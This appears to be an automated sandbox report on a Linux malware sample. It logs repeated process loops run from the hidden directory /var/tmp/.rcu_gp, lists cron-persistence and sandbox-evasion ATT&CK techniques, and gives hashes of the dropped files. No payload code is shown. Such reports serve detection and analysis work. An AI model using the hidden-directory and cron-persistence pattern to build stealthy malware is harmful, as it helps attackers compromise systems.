  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1714
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1715
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1716
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1718
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1717
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1719
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1720
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1721
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    PID:1722
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1724
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1723
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1725
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1726
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1727
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    PID:1728
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1730
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1729
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1731
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1732
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1733
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    PID:1734
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1736
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1735
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1737
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1738
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1739
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1740
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1742
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1741
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1743
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1744
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1745
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1746
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1748
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1747
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1749
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1750
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1751
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    PID:1752
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1754
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1753
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1755
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1756
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1757
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1758
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1760
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1759
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1761
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1762
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1763
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    PID:1764
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1766
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1765
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1767
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1768
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1769
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1770
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1772
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1771
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1773
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1774
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1775
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    PID:1776
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1778
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1777
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1779
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1780
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1781
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1782
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1784
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1783
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1785
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1786
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1787
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    PID:1788
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1790
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1789
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1791
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1792
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1793
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1794
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1796
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1795
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1797
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1798
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1799
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1800
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1802
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1801
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1803
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1804
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1805
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1806
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1808
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1807
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1809
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1810
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1811
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1812
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1814
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1813
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1815
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1816
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1817
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1818
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1820
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1819
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1821
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1822
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1823
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1824
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1826
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1825
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1827
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1828
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1829
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1830
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1832
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1831
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1833
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1834
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1835
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    PID:1836
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1838
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1837
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1839
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1840
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1841
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1842
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1844
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1843
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1845
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1846
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1847
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1848
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1850
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1849
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1851
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1852
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1853
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1854
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1856
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1855
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1857
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1858
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1859
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1860
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1862
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1861
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1863
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1864
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1865
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1866
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1868
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1867
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1869
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1873
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1874
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1875
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1877
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1876
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1878
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1879
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1880
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1881
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1883
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1882
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1884
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1885
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1886
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1887
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1889
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1888
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1890
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1891
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1892
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    PID:1893
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1895
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1894
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1896
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1897
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1898
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1899
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1901
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1900
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1902
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1903
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1904
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1905
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1907
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1906
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1908
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1909
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1910
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    PID:1911
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1913
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1912
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1914
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1915
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1916
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1917
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1919
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1918
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1920
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1921
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1922
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1923
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1925
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1924
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1926
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1927
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1928
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1929
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1931
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1930
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1932
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1933
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1934
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1935
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1937
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1936
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1938
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1939
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1940
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    PID:1941
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1943
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1942
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1944

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:1599

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/var/spool/cron/crontabs/tmp.SkkxPy

Filesize
317B

MD5
2aa2e8258dc2b92483650e19091a0271

SHA1
470bdeee89300fa9a1a9caaf1c0fda8dd9d935aa

SHA256
ad15535722e182af38bca6b0fc935266cac939ae12aceff63094f53a20245294

SHA512
4660df689a738115a0c6503ddd2ea24661248d163b177e20443bd9be7d450bd46ed134c4ede36883742a10de18238ea780d769e0ca4b81e80981847649af11be

Download Submit
/var/tmp/.rcu_gp/.ps4

Filesize
17B

MD5
ed41f347e368587902ee39ae0820e4f3

SHA1
55fc93606d1c801650fb68c85b4535658f44e51b

SHA256
fadf3c99404046418d249eca29c985b40bf34d6bb6000f32bb73f39e0d6e5016

SHA512
5ccd1805d59b3d114eeaaee5a422d4d37c9e7c0629ecfe43111b9c1512c3dbb649fc97e50c4c6d74ac05a0c34b4b53e4924a0dbf4decec83c1db7faed890a607

Download Submit
/var/tmp/.rcu_gp/.ps5

Filesize
31B

MD5
3849d2e2d4fbd74bf13c86237e5f8257

SHA1
1a1d605574d84531c36967e62c50387af56ec048

SHA256
5a91635ed578ff1552d71f49009f5d507273b42d926960b44d952bf659c4b64e

SHA512
06ee5e3db69f1cff254e46e77d6e10ab92729e3fb9dc7f961fc438d98d3fdb00a86b76e05c79215b3a7e4f25ba821285edb1ff8a8a8a76cc9f38b501891d9497

Download Submit
/var/tmp/.rcu_gp/.ps5

Filesize
76B

MD5
268448409cd2df039233e116f5ff4cfd

SHA1
6df0a74b2cef2974dbd8422b027a29a40a5f9ad8

SHA256
00293284adf5483c18ab9f69f92f52fb35568bab00ee7e4f70a490e779ddc3e8

SHA512
774b981b5c388924868f10a61d1e7bc2a4207acef8bd02134d675e2197dd6590ab643201db9d1e5e700fa5d3b83a0f1d53d69c216c3b17dec5c4aec90799609c

Download Submit
/var/tmp/.rcu_gp/.ps5

Filesize
122B

MD5
fc16ad6d39c8c6669ea14e35610d398b

SHA1
0644c85527d59857d780c26d9db9c585066a9f1a

SHA256
d1e064e763215d12123c8711c37a070a6ba95c9458c0f980a308ffbd00863493

SHA512
f219d7a9f1b7c35a1e4be974a62fd7a566c209f8261e06183cf9375925185c0d2e286df2f76fcec941c370738622bd592d1f398b852dda43dafd90d0bb64fe70

Download Submit
/var/tmp/.rcu_gp/.report_system

Filesize
8.4MB

MD5
1271e6e82b344df1c7960230ec449af7

SHA1
7fe3253d34cae21facc8c445c3620b9e8566988b

SHA256
fff96ad553f916da4eb0d55b1075b9b4aea7b93249663aefbc0310e53c7498ba

SHA512
786f8ae08f8cdb892c1d67b216d26ce8db464e445c4884ab23bdfb642d7cc52862ceb77c51b38a2f77c6ae38541ea83f6eaeb2d2c2337a2d96f61738de4ff39c

Download Submit
/var/tmp/.rcu_gp/diicot

Filesize
137B

MD5
8bbab4cb0d4871bf7665cbbe5c7dd305

SHA1
6358fc05a9ca981197dae3cc35c1f49cc61868ec

SHA256
dbeb0bb0eed71abae7cabeec6e3cbda15e1883fb95e7c68c644fdf7eb4b23723

SHA512
8fe9b04e9d71c752bb356f78b4e4e1e704ca89248574817094c4b4404c27f6ba47f870158c449ff1d2a2ec4ebb7c31a8b2857ce15ae7db042a3b4e0f10776cd9

Download Submit